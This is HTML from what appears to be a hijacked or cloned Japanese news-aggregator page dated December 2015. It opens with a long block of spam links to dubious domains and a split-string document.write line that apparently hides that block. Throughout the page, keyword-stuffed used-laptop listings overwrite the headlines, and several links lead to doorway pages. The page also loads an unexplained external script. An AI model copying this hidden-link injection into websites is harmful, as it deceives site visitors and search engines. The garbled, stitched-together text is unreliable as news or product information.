class="z7z8z9z6" href="http://www.snnfi.com/">http://www.snnfi.com/</a> <a class="z7z8z9z6" href="http://www.vfdyd.com/">http://www.vfdyd.com/</a> <a class="z7z8z9z6" href="http://www.lwezk.com/">http://www.lwezk.com/</a> <a class="z7z8z9z6" href="http://www.fpibm.com/">http://www.fpibm.com/</a> <a class="z7z8z9z6" href="http://www.xjvdr.com/">http://www.xjvdr.com/</a> <a class="z7z8z9z6" href="http://www.kvwqf.com/">http://www.kvwqf.com/</a> <a class="z7z8z9z6" href="http://www.utakf.com/">http://www.utakf.com/</a> <a class="z7z8z9z6" href="http://www.gmjeu.com/">http://www.gmjeu.com/</a> <a class="z7z8z9z6" href="http://www.pugfa.com/">http://www.pugfa.com/</a> <a class="z7z8z9z6" href="http://www.bldek.com/">http://www.bldek.com/</a> <a class="z7z8z9z6" href="http://www.vdidu.com/">http://www.vdidu.com/</a> <a class="z7z8z9z6" href="http://www.tufnc.com/">http://www.tufnc.com/</a> <a class="z7z8z9z6" href="http://www.wqxri.com/">http://www.wqxri.com/</a> <a class="z7z8z9z6" href="http://www.uaozz.com/">http://www.uaozz.com/</a> <a class="z7z8z9z6" href="http://www.nhpbd.com/">http://www.nhpbd.com/</a> <a class="z7z8z9z6" href="http://www.dinbz.com/">http://www.dinbz.com/</a> <a class="z7z8z9z6" href="http://www.bopjc.com/">http://www.bopjc.com/</a> <a class="z7z8z9z6" href="http://www.rvkip.com/">http://www.rvkip.com/</a> <a class="z7z8z9z6" href="http://www.jsmqe.com/">http://www.jsmqe.com/</a> <a class="z7z8z9z6" href="http://www.vwygx.com/">http://www.vwygx.com/</a> <a class="z7z8z9z6" href="http://www.zgjm-org.com/">http://www.zgjm-org.com/</a> <a class="z7z8z9z6" href="http://www.shenyangsiyue.com/">http://www.shenyangsiyue.com/</a> <a class="z7z8z9z6" href="http://www.hongsang.net/">http://www.hongsang.net/</a> <a class="z7z8z9z6" href="http://www.gpmrg.cc/">http://www.gpmrg.cc/</a> <a class="z7z8z9z6" href="http://www.knfut.cc/">http://www.knfut.cc/</a> <a class="z7z8z9z6" href="http://www.kjqdh.cc/">http://www.kjqdh.cc/</a> <a class="z7z8z9z6" href="http://www.huang62.win/">http://www.huang62.win/</a> <a class="z7z8z9z6" href="http://www.qiong19.win/">http://www.qiong19.win/</a> <a class="z7z8z9z6" href="http://www.chang34.win/">http://www.chang34.win/</a> <a class="z7z8z9z6" href="http://www.huang71.win/">http://www.huang71.win/</a> <a class="z7z8z9z6" href="http://www.xiong10.win/">http://www.xiong10.win/</a> <a class="z7z8z9z6" href="http://www.chong14.win/">http://www.chong14.win/</a> <a class="z7z8z9z6" href="http://www.chong94.win/">http://www.chong94.win/</a> <a class="z7z8z9z6" href="http://www.zheng23.win/">http://www.zheng23.win/</a> <a class="z7z8z9z6" href="http://www.cheng14.win/">http://www.cheng14.win/</a> <a class="z7z8z9z6" href="http://www.shang72.win/">http://www.shang72.win/</a> <a class="z7z8z9z6" href="http://www.sudanj.win/">http://www.sudanj.win/</a> <a class="z7z8z9z6" href="http://www.russias.win/">http://www.russias.win/</a> <a class="z7z8z9z6" href="http://www.malim.win/">http://www.malim.win/</a> <a class="z7z8z9z6" href="http://www.nigery.win/">http://www.nigery.win/</a> <a class="z7z8z9z6" href="http://www.malix.win/">http://www.malix.win/</a> <a class="z7z8z9z6" href="http://www.peruf.win/">http://www.peruf.win/</a> <a class="z7z8z9z6" href="http://www.iraqq.win/">http://www.iraqq.win/</a> <a class="z7z8z9z6" href="http://www.nepali.win/">http://www.nepali.win/</a> <a class="z7z8z9z6" href="http://www.syriax.win/">http://www.syriax.win/</a> <a class="z7z8z9z6" href="http://www.junnp.pw/">http://www.junnp.pw/</a> <a class="z7z8z9z6" href="http://www.junnp.win/">http://www.junnp.win/</a> <a class="z7z8z9z6" href="http://www.zanpianba.com/">http://www.zanpianba.com/</a> <a class="z7z8z9z6" href="http://www.shoujimaopian.com/">http://www.shoujimaopian.com/</a> <a class="z7z8z9z6" href="http://www.gaoqingkanpian.com/">http://www.gaoqingkanpian.com/</a> <a class="z7z8z9z6" href="http://www.kuaibokanpian.com/">http://www.kuaibokanpian.com/</a> <a class="z7z8z9z6" href="http://www.baidukanpian.com/">http://www.baidukanpian.com/</a> <a class="z7z8z9z6" href="http://www.wwwren99com.top/">http://www.wwwren99com.top/</a> <a class="z7z8z9z6" href="http://www.wwwdgshunyuancom.top/">http://www.wwwdgshunyuancom.top/</a> <a class="z7z8z9z6" href="http://www.xianfengziyuancom.top/">http://www.xianfengziyuancom.top/</a> <a class="z7z8z9z6" href="http://www.www96yyxfcom.top/">http://www.www96yyxfcom.top/</a> <a class="z7z8z9z6" href="http://www.www361dywnet.top/">http://www.www361dywnet.top/</a> <a class="z7z8z9z6" href="http://www.wwwbambootechcc.top/">http://www.wwwbambootechcc.top/</a> <a class="z7z8z9z6" href="http://www.wwwluoqiqicom.top/">http://www.wwwluoqiqicom.top/</a> <a class="z7z8z9z6" href="http://www.wwwyyxfnrzcom.top/">http://www.wwwyyxfnrzcom.top/</a> <a class="z7z8z9z6" href="http://www.wwwzhengdadycom.top/">http://www.wwwzhengdadycom.top/</a> <a class="z7z8z9z6" href="http://www.wwwyewaishengcuncom.top/">http://www.wwwyewaishengcuncom.top/</a> <a class="z7z8z9z6" href="http://www.wwwcong3win.top/">http://www.wwwcong3win.top/</a> <a class="z7z8z9z6" href="http://www.wwwmh-oemcn.top/">http://www.wwwmh-oemcn.top/</a> <a class="z7z8z9z6" href="http://www.henhen168com.top/">http://www.henhen168com.top/</a> <a class="z7z8z9z6" href="http://www.wwwhztuokuncom.top/">http://www.wwwhztuokuncom.top/</a> <a class="z7z8z9z6" href="http://www.wwwyasyzxcn.top/">http://www.wwwyasyzxcn.top/</a> <a class="z7z8z9z6" href="http://www.www9hkucom.top/">http://www.www9hkucom.top/</a> <a class="z7z8z9z6" href="http://www.wwwguokrcom.top/">http://www.wwwguokrcom.top/</a> <a class="z7z8z9z6" href="http://www.avhhhhcom.top/">http://www.avhhhhcom.top/</a> <a class="z7z8z9z6" href="http://www.shouyouaipaicom.top/">http://www.shouyouaipaicom.top/</a> <a class="z7z8z9z6" href="http://www.wwwdouyutvcom.top/">http://www.wwwdouyutvcom.top/</a> <a class="z7z8z9z6" href="http://www.bbsptbuscom.top/">http://www.bbsptbuscom.top/</a> <a class="z7z8z9z6" href="http://www.miphonetgbuscom.top/">http://www.miphonetgbuscom.top/</a> <a class="z7z8z9z6" href="http://www.wwwtjkunchengcom.top/">http://www.wwwtjkunchengcom.top/</a> <a class="z7z8z9z6" href="http://www.lolboxduowancom.top/">http://www.lolboxduowancom.top/</a> <a class="z7z8z9z6" href="http://www.wwwtaoyuancncom.top/">http://www.wwwtaoyuancncom.top/</a> <a class="z7z8z9z6" href="http://www.wwwngffwcomcn.top/">http://www.wwwngffwcomcn.top/</a> <a class="z7z8z9z6" href="http://www.wwwqingzhouwanhecom.top/">http://www.wwwqingzhouwanhecom.top/</a> <a class="z7z8z9z6" href="http://www.wwwckyygcn.top/">http://www.wwwckyygcn.top/</a> <a class="z7z8z9z6" href="http://www.wwwcdcjzcn.top/">http://www.wwwcdcjzcn.top/</a> <a class="z7z8z9z6" href="http://www.m6downnet.top/">http://www.m6downnet.top/</a> <a class="z7z8z9z6" href="http://www.msmzycom.top/">http://www.msmzycom.top/</a> <a class="z7z8z9z6" href="http://www.wwwcaobolcom.top/">http://www.wwwcaobolcom.top/</a> <a class="z7z8z9z6" href="http://www.m3533com.top/">http://www.m3533com.top/</a> <a class="z7z8z9z6" href="http://www.gmgamedogcn.top/">http://www.gmgamedogcn.top/</a> <a class="z7z8z9z6" href="http://www.m289com.top/">http://www.m289com.top/</a> <a class="z7z8z9z6" href="http://www.jcbnscom.top/">http://www.jcbnscom.top/</a> <a class="z7z8z9z6" href="http://www.www99daocom.top/">http://www.www99daocom.top/</a> <a class="z7z8z9z6" href="http://www.3gali213net.top/">http://www.3gali213net.top/</a> <a class="z7z8z9z6" href="http://www.wwwmeidaiguojicom.top/">http://www.wwwmeidaiguojicom.top/</a> <a class="z7z8z9z6" href="http://www.msz1001net.top/">http://www.msz1001net.top/</a> <a class="z7z8z9z6" href="http://www.luyiluueappcom.top/">http://www.luyiluueappcom.top/</a> <a class="z7z8z9z6" href="http://www.wwwvcnnnet.top/">http://www.wwwvcnnnet.top/</a> <a class="z7z8z9z6" href="http://www.wwwchaoaicaicom.top/">http://www.wwwchaoaicaicom.top/</a> <a class="z7z8z9z6" href="http://www.mcnmocom.top/">http://www.mcnmocom.top/</a> <a class="z7z8z9z6" href="http://www.wwwqiuxia88com.top/">http://www.wwwqiuxia88com.top/</a> <a class="z7z8z9z6" href="http://www.www5253com.top/">http://www.www5253com.top/</a> <a class="z7z8z9z6" href="http://www.wwwhaichuanwaiyucom.top/">http://www.wwwhaichuanwaiyucom.top/</a> <a class="z7z8z9z6" href="http://www.wwwulunarcn.top/">http://www.wwwulunarcn.top/</a> <a class="z7z8z9z6" href="http://www.wwwvideo6868com.top/">http://www.wwwvideo6868com.top/</a> <a class="z7z8z9z6" href="http://www.wwwythmbxgcom.top/">http://www.wwwythmbxgcom.top/</a> <a class="z7z8z9z6" href="http://www.gakaycom.top/">http://www.gakaycom.top/</a> <a class="z7z8z9z6" href="http://www.wwwhf1zcom.top/">http://www.wwwhf1zcom.top/</a> <a class="z7z8z9z6" href="http://www.wwwkrd17net.top/">http://www.wwwkrd17net.top/</a> <a class="z7z8z9z6" href="http://www.qqav4444net.top/">http://www.qqav4444net.top/</a> <a class="z7z8z9z6" href="http://www.www5a78com.top/">http://www.www5a78com.top/</a> <a class="z7z8z9z6" href="http://www.hztuokuncom.top/">http://www.hztuokuncom.top/</a> <a class="z7z8z9z6" href="http://www.wwwqqqav7979net.top/">http://www.wwwqqqav7979net.top/</a> <a class="z7z8z9z6" href="http://www.sscaoacom.top/">http://www.sscaoacom.top/</a> <a class="z7z8z9z6" href="http://www.51yeyelu.info/">http://www.51yeyelu.info/</a> <a class="z7z8z9z6" href="http://www.52luyilu.info/">http://www.52luyilu.info/</a> <a class="z7z8z9z6" href="http://www.52yeyelu.info/">http://www.52yeyelu.info/</a> <a class="z7z8z9z6" href="http://www.91yeyelu.info/">http://www.91yeyelu.info/</a> <a class="z7z8z9z6" href="http://www.yeyelupic.info/">http://www.yeyelupic.info/</a> <script>document.write ('</' + 'di' + 'v c' + 'l' + 'ass=' + '"' + 'z7z' + '8z9z' + '6' + '"' + '>');</script> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ja" lang="ja"> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <meta http-equiv="Content-Script-Type" content="text/javascript" /> <meta http-equiv="Content-Style-Type" content="text/css" /> <title>中古パソコン 【即納】 送料無料 【訳ありの為値下げしました!】富士通 FMV-E8220 CoreDuo T2500搭載 HDD【新品】500GB搭載 15インチ(SXGA+)液晶 Office 3ヶ月保証 (P44w)中古 ! 【中古】 </title> <meta name="keywords" content="中古パソコン 【即納】 送料無料 【訳ありの為値下げしました!】富士通 FMV-E8220 CoreDuo T2500搭載 HDD【新品】500GB搭載 15インチ(SXGA+)液晶 Office 3ヶ月保証 (P44w)中古 ! 【中古】 " /> <meta name="description" content="中古 HDMIテレビ出力対応限定一台?中古 デスクトップパソコンSONY VAIO VGX-TP1S Core2Duo T7200 2.0GHz/PC2-5300 2GB/HDD 160GB/DVDマルチドライブ/無線LAN内蔵/Windows7 Home Premium SP1導入/リカバリCD?OFFICE2013付き,中古パソコン 【即納】 送料無料 【訳ありの為値下げしました!】富士通 FMV-E8220 CoreDuo T2500搭載 HDD【新品】500GB搭載 15インチ(SXGA+)液晶 Office 3ヶ月保証 (P44w)中古 ! 【中古】 ,中古パソコン 中古ノートパソコン FUJITSU BIBLO NF/B40 Celeron 550 2.0GHz/PC2-5300 2GB/HDD 250GB/DVDマルチドライブ/無線LAN内蔵/Windows7 Home Premium SP1導入/リカバリCD?OFFICE2013付き中古" /> <meta name="viewport" content="width=device-width; initial-scale=1.0;" /> <meta name="twitter:card" content="summary" /> <meta name="twitter:site" content="中古パソコン 中古ノートパソコン NEC Lavie LL590/G AMD Sempron Processor 3200 1.6GHz/PC2-5300 2GB/HDD 80GB/DVDマルチドライブ/無線LAN内蔵/Windows7 Home Premium 導入/リカバリCD?OFFICE2013付き中古パソコン" /> <meta property="og:title" content="中古パソコン 中古ノートパソコン FUJITSU FMV-E780/B Corei5 M560 2.67GHz/PC3-8500 4GB/HDD 160GB(DtoD)/無線内蔵/DVDマルチドライブ/Windows7 Professional導入/リカバリ領域?OFFICE2013付き 中古" /> <meta property="og:description" content="中古 マニュアル付き?開封Microsoft Office 2007付き? 中古ノートパソコン SONY VAIO VGN-NW50JB Core2Duo P8700 2.53GHz/PC3-8500 2GB/HDD 500GB/無線内蔵/DVDマルチドライブ/WindowsVista Home Premium 導入/リカバリ領域付き,中古パソコン 【即納】 送料無料 【訳ありの為値下げしました!】富士通 FMV-E8220 CoreDuo T2500搭載 HDD【新品】500GB搭載 15インチ(SXGA+)液晶 Office 3ヶ月保証 (P44w)中古 ! 【中古】 ,中古 11n対応新品無線LANアダプタ付き? 中古ノートパソコン SHARP PC-WA70K AMD Sempron 2800+/PC-2700 1GB/HDD 80GB/DVDマルチドライブ/Windows7 Home PremiumSP1 32ビット 導入/リカバリCD?OFFICE2013付き" /> <meta property="og:site_name" content="中古パソコン 【即納】 送料無料 【訳ありの為値下げしました!】富士通 FMV-E8220 CoreDuo T2500搭載 HDD【新品】500GB搭載 15インチ(SXGA+)液晶 Office 3ヶ月保証 (P44w)中古 ! 【中古】 " /> <link rel="stylesheet" type="text/css" href="http://ceron.jp/css.css" media="all" /> <link rel="stylesheet" type="text/css" href="http://ceron.jp/js/jquery-ui.css" media="all" /> <link rel="alternate" type="application/rss+xml" title="RSS" href="p-3296.html" /> <script type="text/javascript" src="./hippo1224.js"></script>p-3296.html" </head> <body> <div id="main" class="top"> <div id="header"> <div id="header_inner"> <div id="leader">中古パソコン 【即納】 送料無料 【訳ありの為値下げしました!】富士通 FMV-E8220 CoreDuo T2500搭載 HDD【新品】500GB搭載 15インチ(SXGA+)液晶 Office 3ヶ月保証 (P44w)中古 ! 【中古】 ,パソコン 中古パソコン 中古ノートパソコン TOSHIBA dynabook R731/E 第2世代 Core i3 プロセッサー 4GBメモリ 250GB 無線 Windows7 Professional/リカバリ領域 KingosftOffice付(2013) パソコン 中古パソコンノート 中古ノートパソコン 中古<span class="icon_set"> <a href="http://www.twitter.com/" target="_blank" title="twitter中古パソコン 【即納】 送料無料 【訳ありの為値下げしました!】富士通 FMV-E8220 CoreDuo T2500搭載 HDD【新品】500GB搭載 15インチ(SXGA+)液晶 Office 3ヶ月保証 (P44w)中古 ! 【中古】 " class="icon icon_twitter"></a> <a href="https://www.facebook.com/" target="_blank" title="facebook中古パソコン 【即納】 送料無料 【訳ありの為値下げしました!】富士通 FMV-E8220 CoreDuo T2500搭載 HDD【新品】500GB搭載 15インチ(SXGA+)液晶 Office 3ヶ月保証 (P44w)中古 ! 【中古】 " class="icon icon_facebook"></a> </span> </div> <div id="header_menu" onclick="toggle('drop_menu');"> <div id="drop_menu" style="display:none;"> <ul> <li><a href="" class="selected">トップ</a></li><li><a href="">中古パソコン 【即納】 送料無料 【訳ありの為値下げしました!】富士通 FMV-E8220 CoreDuo T2500搭載 HDD【新品】500GB搭載 15インチ(SXGA+)液晶 Office 3ヶ月保証 (P44w)中古 ! 【中古】 </a></li><li><a href="">ニュース総合</a></li><li><a href="">中古 中古ノートパソコン DELL Inspiron 1501 AMD Turion64 X 2 TL-50 1.6GHz/PC2-5300 2GB/HDD 120GB/DVDコンボドライブ/無線LAN/WindowsVista Home Premium 導入/リカバリCD?OFFICE2013付き</a></li><li><a href="">エンタメ</a></li><li><a href="">スポーツ</a></li><li><a href="">IT</a></li><li><a href="">中古 マニュアル付き? 中古ノートパソコン SONY VAIO VGN-TX52B CeleronM 1.06GHz/PC2-5300 1GB/HDD 80GB(DtoD)/DVDマルチドライブ/無線LAN内蔵/WindowsXP Home Edition/リカバリ領?OFFICE域付き</a></li><li><a href="">科学</a></li><li><a href="">中古 中古ノートパソコン DELL LATITUDE D520 CeleronM 1.60GHz/PC2-5300 2GB/HDD 60GB/DVDコンボドライブ/無線LAN内蔵/WindowsXp Pro/リカバリCD?OFFICE2013付き</a></li><li><a href="">動画</a></li><li><a href="">中古パソコン 【即納】 送料無料 【訳ありの為値下げしました!】富士通 FMV-E8220 CoreDuo T2500搭載 HDD【新品】500GB搭載 15インチ(SXGA+)液晶 Office 3ヶ月保証 (P44w)中古 ! 【中古】 </a></li><li><a href="">ネタ</a></li><li><a href="">中古パソコン 【即納】 送料無料 【訳ありの為値下げしました!】富士通 FMV-E8220 CoreDuo T2500搭載 HDD【新品】500GB搭載 15インチ(SXGA+)液晶 Office 3ヶ月保証 (P44w)中古 ! 【中古】 </a></li> <li><a href='http://ceron.jp/registered.html'>メディア一覧</a></li> <li><a href=''>ランキング</a></li> <li><a href='https://twitter.com/' target='_blank'>Twitter</a></li> <li><a href=''>ヘルプ</a></li> <li><a href=''>設定</a></li> <li><a href=''>中古パソコン 【即納】 送料無料 【訳ありの為値下げしました!】富士通 FMV-E8220 CoreDuo T2500搭載 HDD【新品】500GB搭載 15インチ(SXGA+)液晶 Office 3ヶ月保証 (P44w)中古 ! 【中古】 </a></li> </ul> </div> </div> <h1> <a id="logo" href="" title="中古パソコン 【即納】 送料無料 【訳ありの為値下げしました!】富士通 FMV-E8220 CoreDuo T2500搭載 HDD【新品】500GB搭載 15インチ(SXGA+)液晶 Office 3ヶ月保証 (P44w)中古 ! 【中古】 "> <img class="logo_l" src="../img/logo.png" width="184px" height="54px" /> </h1> <form action="/search" method="get" name="search" id="header_search" onsubmit="return headerSearchReady();"> <div id="input_box"><input type="text" id="header_search_textarea" class="search" name="q" value="" placeholder="キーワード or URL" onclick="if(!this.value){this.setAttribute('AutoComplete','on');}" onkeyup="this.setAttribute('AutoComplete', 'off');" onsubmit="this.setAttribute('AutoComplete', 'on');" /></div> <div class="search_button" onclick="document.getElementById('submitButton').click();"></div> <input type="submit" style="display:none;" id="submitButton" /> </form> </div><!--end header_inner--> </div><!--end header--> <div id="menu_bar" class="menu_bar"> <div id="menu_bar_inner" class="menu_bar_inner"><ul><li><a href="" class="selected">トップ</a></li><li><a href="">速報</a></li><li><a href="">中古パソコン 訳あり? 中古ノートパソコン FUJITSU FMV-BIBLO NF/A70 Core2Duo T8100 2.10GHz/PC2-5300 2GB/HDD 160GB(DtoD)/WindowsVista Home Premium導入/DVDマルチドライブ/無線LAN内蔵/リカバリ領域中古</a></li><li><a href="">政治経済</a></li><li><a href="">中古パソコン 【即納】 送料無料 【訳ありの為値下げしました!】富士通 FMV-E8220 CoreDuo T2500搭載 HDD【新品】500GB搭載 15インチ(SXGA+)液晶 Office 3ヶ月保証 (P44w)中古 ! 【中古】 </a></li><li><a href="">スポーツ</a></li><li><a href="">IT</a></li><li><a href="">海外</a></li><li><a href="">科学</a></li><li><a href="">中古パソコン 中古ノートパソコン TOSHIBA dynabook TX/65HS Core2Duo P8600 2.40Hz/メモリ PC2-6400 2GB/HDD 250GB(DtoD)/DVDマルチドライブ/無線内蔵/WindowsVista Home Premium /リカバリ領域? OFFICE2013付き中古</a></li><li><a href="">動画</a></li><li><a href="">中古パソコン 【即納】 送料無料 【訳ありの為値下げしました!】富士通 FMV-E8220 CoreDuo T2500搭載 HDD【新品】500GB搭載 15インチ(SXGA+)液晶 Office 3ヶ月保証 (P44w)中古 ! 【中古】 </a></li><li><a href="">ネタ</a></li><li><a href="">すべて</a></li></ul></div> </div><!-- /menu_bar --> <div id="fixed_header" class="menu_bar" style="margin-top:-240px;"> <div id="fixed_header_inner" class="menu_bar_inner"> <a href="/"><img src="../img/logo.png" width="92px" height="27px" /></a> </div> </div> <div id="field"> <div id="field_inner"> <div id="main_column"> <div id="main_column_inner"><div id="pan"></div><a name="area_1"></a> <div class="item_list_box " id="area_1"> <div class="list_title"> <div class="controler"></div> <h2><a href="">ニュース総合</a></h2> </div> <div class='pickup'><div class="item detail_item"> <div class="item_status"> <span class="link_num over500">528<span>コメント</span></span> <span class="date date_new">4 時間前  </span> <a href="http://headlines.yahoo.co.jp/hl?a=20151226-00050002-yom-soci" target="_blank" class="item_direct"> - headlines.yahoo.co.jp</a></div> <div class="item_title"><a href="">中古パソコン 【即納】 送料無料 【訳ありの為値下げしました!】富士通 FMV-E8220 CoreDuo T2500搭載 HDD【新品】500GB搭載 15インチ(SXGA+)液晶 Office 3ヶ月保証 (P44w)中古 ! 【中古】 ,中古パソコン 11n対応新品無線LANアダプタ付き 中古一体型パソコン FUJITSU DESKPOWER FMV LX55Y Core2Duo E4500 2.2GHz/2GB/HDD 320GB/DVDマルチドライブ/Windows7 Home Premium SP1導入/中古 PC/Windows 7/リカバリCD?OFFICE2013付き 中古,中古パソコン 【即納】 送料無料 【訳ありの為値下げしました!】富士通 FMV-E8220 CoreDuo T2500搭載 HDD【新品】500GB搭載 15インチ(SXGA+)液晶 Office 3ヶ月保証 (P44w)中古 ! 【中古】 ,中古パソコン 限定一台? 中古ノートパソコン lenovo/IBM ThinkPad T410i Intel Core i3 M330 2.13GHz/PC3-8500 4GB/HDD 250GB(DtoD)/DVDマルチドライブ/無線LAN内蔵/Windows7 Professional 32ビット/リカバリ領域?OFFICE2013付き!中古</a></div> <div class="thumbnail"><a class="trimming imgbox" href="http://ceron.jp/url/headlines.yahoo.co.jp/hl?a=20151226-00050002-yom-soci" style="width:120px;height:120px;"><img src="http://img.ceron.jp/db592e52fb3695e73bb88902c6c90a5b239cd30b.jpg" width="120" height="120" onerror="this.parentNode.style.display='none'" style="left:0px" /></a></div><p>中古パソコン 【即納】 送料無料 【訳ありの為値下げしました!】富士通 FMV-E8220 CoreDuo T2500搭載 HDD【新品】500GB搭載 15インチ(SXGA+)液晶 Office 3ヶ月保証 (P44w)中古 ! 【中古】 ,中古 未開封新品MS OFFICE 2003付き?SONY VAIO VGN-T72B PentiumM 753 1.2GHz/PC-2700 512MB/HDD 60GB/DVDマルチドライブ/WindowsXP Home Edition/リカバリ領域付き,中古パソコン 【即納】 送料無料 【訳ありの為値下げしました!】富士通 FMV-E8220 CoreDuo T2500搭載 HDD【新品】500GB搭載 15インチ(SXGA+)液晶 Office 3ヶ月保証 (P44w)中古 ! 【中古】 ,中古パソコン 【即納】 送料無料 【訳ありの為値下げしました!】富士通 FMV-E8220 CoreDuo T2500搭載 HDD【新品】500GB搭載 15インチ(SXGA+)液晶 Office 3ヶ月保証 (P44w)中古 ! 【中古】 ,中古 中古ノートパソコン lenovo/IBM ThinkPad R60e Type:0657-BFJ Core2Duo T5500 1.66GHz/PC2-5300 1GB/HDD 60GB/WindowsXP Professional導入済み/リカバリ領域?OFFICE2013付き/中古 /ノートPC</span>...[<a href="http://headlines.yahoo.co.jp/hl?a=20151226-00050002-yom-soci" target="_blank">続きを読む</a>]</p> </div> </div><span class='debug' style='display:none;'><!--score: 70 --></span> <div class="item"> <div class="item_status"> <span class="link_num over100">398<span>コメント</span></span> <span class="date date_new">4 時間前  </span> <a href="http://headlines.yahoo.co.jp/hl?a=20151226-00000062-san-sctch" target="_blank" class="item_direct"> - headlines.yahoo.co.jp</a></div> <div class="item_title"><a href="http://factory.aedew.com/images/Core2Duo/020410323u66er.html">http://factory.aedew.com/images/Core2Duo/020410323u66er.html</a></div> </div> <span class='debug' style='display:none;'><!--score: 55 --></span> <div class="item"> <div class="item_status"> <span class="link_num over100">198<span>コメント</span></span> <span class="date date_new">5 時間前  </span> <a href="http://www.yomiuri.co.jp/national/20151226-OYT1T50002.html" target="_blank" class="item_direct"> - www.yomiuri.co.jp</a></div> <div class="item_title"><a href="http://factory.aedew.com/images/Core2Duo/020410384e31gw.html">http://factory.aedew.com/images/Core2Duo/020410384e31gw.html</a></div> </div> <span class='debug' style='display:none;'><!--score: 36 --></span> <div class="item"> <div class="item_status"> <span class="link_num over100">194<span>コメント</span></span> <span class="date date_new">6 時間前  </span> <a href="http://www.sankei.com/life/news/151226/lif1512260005-n1.html" target="_blank" class="item_direct"> - www.sankei.com</a></div> <div class="item_title"><a href="">中古パソコン 【即納】 送料無料 【訳ありの為値下げしました!】富士通 FMV-E8220 CoreDuo T2500搭載 HDD【新品】500GB搭載 15インチ(SXGA+)液晶 Office 3ヶ月保証 (P44w)中古 ! 【中古】 ,中古 限定一台?未開封品MS OFFICE 2003付き? 中古ノートパソコン NEC LaVie LE150/C Celeron P4600 2.0GHz /メモリ 2GB/HDD 320GB/DVDマルチドライブ/無線内蔵/Windows7 Home Premium SP1 32ビット/リカバリCD,中古パソコン オリジナル無線キーボード?中古 マウスセット付き?中古一体型パソコン NEC VALUESTAR VN750/L AMD Sempron 3600+ 2.0GHz/PC2-5300 2GB/HDD 160GB(DtoD)/DVDマルチドライブ/無線LAN内蔵/WindowsVista/リカバリ領域?OFFICE2013付き中古</a></div> </div> <span class='debug' style='display:none;'><!--score: 30 --></span> <div class="item"> <div class="item_status"> <span class="link_num over100">191<span>コメント</span></span> <span class="date date_new">3 時間前  </span> <a href="http://www.asahi.com/articles/ASHDT662ZHDTTPJB01B.html" target="_blank" class="item_direct"> - www.asahi.com</a></div> <div class="item_title"><a href="">中古パソコン 【即納】 送料無料 【訳ありの為値下げしました!】富士通 FMV-E8220 CoreDuo T2500搭載 HDD【新品】500GB搭載 15インチ(SXGA+)液晶 Office 3ヶ月保証 (P44w)中古 ! 【中古】 ,中古 中古ノートパソコン SHARP Mebius PC-WE50V AMD Sempron 3400+ 1.8GHz/PC2-5300 2GB/HDD 120GB/DVDマルチドライブ/無線LAN内蔵/Windows7 Home Premium 導入/リカバリCD?OFFICE2013付き/中古パソコン /ノートPC/WINDOWS 7</a></div> </div> <span class='debug' style='display:none;'><!--score: 29 --></span> <div class="more"><a href="http://www.yomiuri.co.jp/latestnews/?from=ygnav2">ニュース総合 をもっと見る</a></div> </div> <a name="area_2"></a> <div class="item_list_box " id="area_2"> <div class="list_title"> <div class="controler"></div> <h2><a href="http://factory.aedew.com/images/Core2Duo/020410537r53nc.html">http://factory.aedew.com/images/Core2Duo/020410537r53nc.html</a></h2> </div> <div class='pickup'><div class="item detail_item"> <div class="item_status"> <span class="link_num over100">146<span>コメント</span></span> <span class="date date_new">6 時間前  </span> <a href="http://www.sankei.com/politics/news/151226/plt1512260001-n1.html" target="_blank" class="item_direct"> - www.sankei.com</a></div> <div class="item_title"><a href="">【岸田外相訪韓】元慰安婦支援で日韓“折半”出資案が浮上 韓国の蒸し返しを封じる狙い(1/2ページ) - 産経ニュース</a></div> <div class="thumbnail"><a class="trimming imgbox" href="http://ceron.jp/url/www.sankei.com/politics/news/151226/plt1512260001-n1.html" style="width:120px;height:120px;"><img src="http://img.ceron.jp/3d712f4a9f0d5a17af803c20b36a4d9d8bec0ea2.jpg" width="120" height="170" onerror="this.parentNode.style.display='none'" style="left:0px" /></a></div><p>中古パソコン 【即納】 送料無料 【訳ありの為値下げしました!】富士通 FMV-E8220 CoreDuo T2500搭載 HDD【新品】500GB搭載 15インチ(SXGA+)液晶 Office 3ヶ月保証 (P44w)中古 ! 【中古】 ,中古パソコン 中古 デスク mouse computer Intel Pentium Dual-Core E2140 1.60GHz/PC2-5300 1GB/HDD 160GB/DVDマルチドライブ/Windows7 Home Premium SP1 32ビット/OSリカバリCD?OFFICE2013付き,中古パソコン 【即納】 送料無料 【訳ありの為値下げしました!】富士通 FMV-E8220 CoreDuo T2500搭載 HDD【新品】500GB搭載 15インチ(SXGA+)液晶 Office 3ヶ月保証 (P44w)中古 ! 【中古】 ,中古 訳あり? 中古ノートパソコン EVEREX StepNote VC1600J Celeron T1600 1.66GHz/メモリ PC2-5300 2GB/HDD 80GB/DVDマルチドライブ/無線内蔵/Windows7 Home Premium SP1/リカバリCD? OFFICE2013付き/MRR Windows7,中古パソコン 【即納】 送料無料 【訳ありの為値下げしました!】富士通 FMV-E8220 CoreDuo T2500搭載 HDD【新品】500GB搭載 15インチ(SXGA+)液晶 Office 3ヶ月保証 (P44w)中古 ! 【中古】 ,中古 中古ノートパソコン DELL Inspiron 1501 AMD Turion64 X 2 TL-50 1.6GHz/PC2-5300 2GB/HDD 120GB/DVDコンボドライブ/Windows7 Home Premium SP1 32ビット導入/リカバリCD?OFFICE2013付き</span>...[<a href="http://www.sankei.com/politics/news/151226/plt1512260001-n1.html" target="_blank">続きを読む</a>]</p> </div> </div><span class='debug' style='display:none;'><!--score: 27 --></span> <div class="item"> <div class="item_status"> <span class="link_num over20">69<span>コメント</span></span> <span class="date date_new">7 時間前  </span> <a href="http://www.sankei.com/politics/news/151226/plt1512260002-n1.html" target="_blank" class="item_direct"> - www.sankei.com</a></div> <div class="item_title"><a href="">【辺野古移設問題】活動家を初の起訴 シュワブ前で機動隊員を蹴る 反対派の活動実態を解明へ(1/2ページ) - 産経ニュース</a></div> </div> <span class='debug' style='display:none;'><!--score: 16 --></span> <div class="item"> <div class="item_status"> <span class="link_num over100">129<span>コメント</span></span> <span class="date date_new">9 時間前  </span> <a href="http://www.yomiuri.co.jp/world/20151225-OYT1T50134.html" target="_blank" class="item_direct"> - www.yomiuri.co.jp</a></div> <div class="item_title"><a href="">中古パソコン 【即納】 送料無料 【訳ありの為値下げしました!】富士通 FMV-E8220 CoreDuo T2500搭載 HDD【新品】500GB搭載 15インチ(SXGA+)液晶 Office 3ヶ月保証 